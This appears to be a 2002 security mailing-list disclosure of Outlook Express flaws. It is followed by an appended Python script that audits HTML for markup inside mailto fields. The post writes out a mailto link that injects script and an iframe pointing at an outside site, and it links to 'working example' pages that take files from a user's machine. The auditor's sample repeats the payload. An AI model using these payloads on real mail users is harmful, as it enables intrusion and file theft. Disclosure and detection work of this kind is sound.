From: http-equivexcite.com
Date: Sun Apr 14 2002 - 16:59:13 CDT

    Sunday, April 14, 2002

    1. Not Possible

    Technically it cannot be possible to create an html mail message from
    a mailto url scheme without user input. However shoe-horning html in
    through insertion of script tags does make it possible. Default
    installation of Outlook Express, and probably Outlook, is 'mail
    sending format: html':

    <a href="mailto: freakbloatedcorp.com
    ?cc=contestbloatedcorp.com
    &subject=Million Dollar Contest
    &body=<script></script>
    <iframe src=http://www.malware.com'>">
     contestbloatedcorp.com </a>

    This is not a good idea.

    Working Example:

    http://www.malware.com/$illine$$.html

    Note: this is an 8-month-old 'thing':
    http://www.securityfocus.com/bid/3334

    2. EVEN WORSE:

    Trivial file theft using Outlook Express, maybe Outlook. Instead of
    delivering files to the target computer, we rather take files from
    the target computer. With a bit of Idiot Engineering, we reverse the
    process as detailed here: http://www.securityfocus.com/bid/1221 and
    here: http://www.kb.cert.org/vuls/id/31994.

    Note: now almost 24 months old.

    Working Example:

    This will pluck and send your Autoexec.bat from a default Windows
    installation. Targeted computers with specific files can prove more
    lucrative.

    http://www.malware.com/idiot$.html

    Notes:

    1. Outlook Express 6 default mail is in the 'restricted zone'.
    Outlook Express 5.5 isn't. Disable ActiveX and all those other
    things.

    2. Do not send 'unknown' webmasters entire web pages despite how
    tempting the request is.

    3. Scraping the bottom of the barrel.

    End Call.

    --
    http://www.malware.com
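
Added example, not part of the original post: a defensive check in Python that parses a web page or HTML message and reports mailto: links whose subject/cc/body fields carry HTML markup, the pattern shown in item 1. The function names, addresses and sample page are constructed for illustration.

```python
import re
from html.parser import HTMLParser
from urllib.parse import parse_qs

# A tag opener ("<x", "</x", "<!x") has no place in a plain-text mailto field.
MARKUP = re.compile(r"<[/!]?[a-z]", re.IGNORECASE)


class MailtoAuditor(HTMLParser):
    """Collects (line, field, value) for mailto fields that contain markup."""

    def __init__(self):
        super().__init__(convert_charrefs=True)
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("a", "area"):
            return
        for name, value in attrs:
            if name == "href" and value:
                self._check(value.strip())

    def _check(self, href):
        if not href.lower().startswith("mailto:"):
            return
        _, _, query = href.partition("?")
        # parse_qs percent-decodes, so %3Cscript%3E is caught as well.
        for field, values in parse_qs(query, keep_blank_values=True).items():
            for v in values:
                if MARKUP.search(v):
                    line = self.getpos()[0]
                    self.findings.append((line, field.strip().lower(), v.strip()))


def audit(html_text):
    auditor = MailtoAuditor()
    auditor.feed(html_text)
    auditor.close()
    return auditor.findings


# Constructed sample: a plain link, one with raw markup, one percent-encoded.
SAMPLE = """<p><a href="mailto:info@example.test?subject=Hello">ok</a></p>
<p><a href="mailto:a@example.test?cc=b@example.test&subject=Contest&body=<script></script><iframe src=http://example.test/>">raw</a></p>
<p><a href="mailto:a@example.test?body=%3Ciframe%20src%3Dhttp%3A%2F%2Fexample.test%2F%3E">encoded</a></p>
"""

if __name__ == "__main__":
    for line, field, value in audit(SAMPLE):
        print(f"line {line}: mailto field '{field}' contains markup: {value!r}")
```

A finding means the link would pre-fill a message with markup that an HTML-format mail client may render; the check does not judge what that markup does.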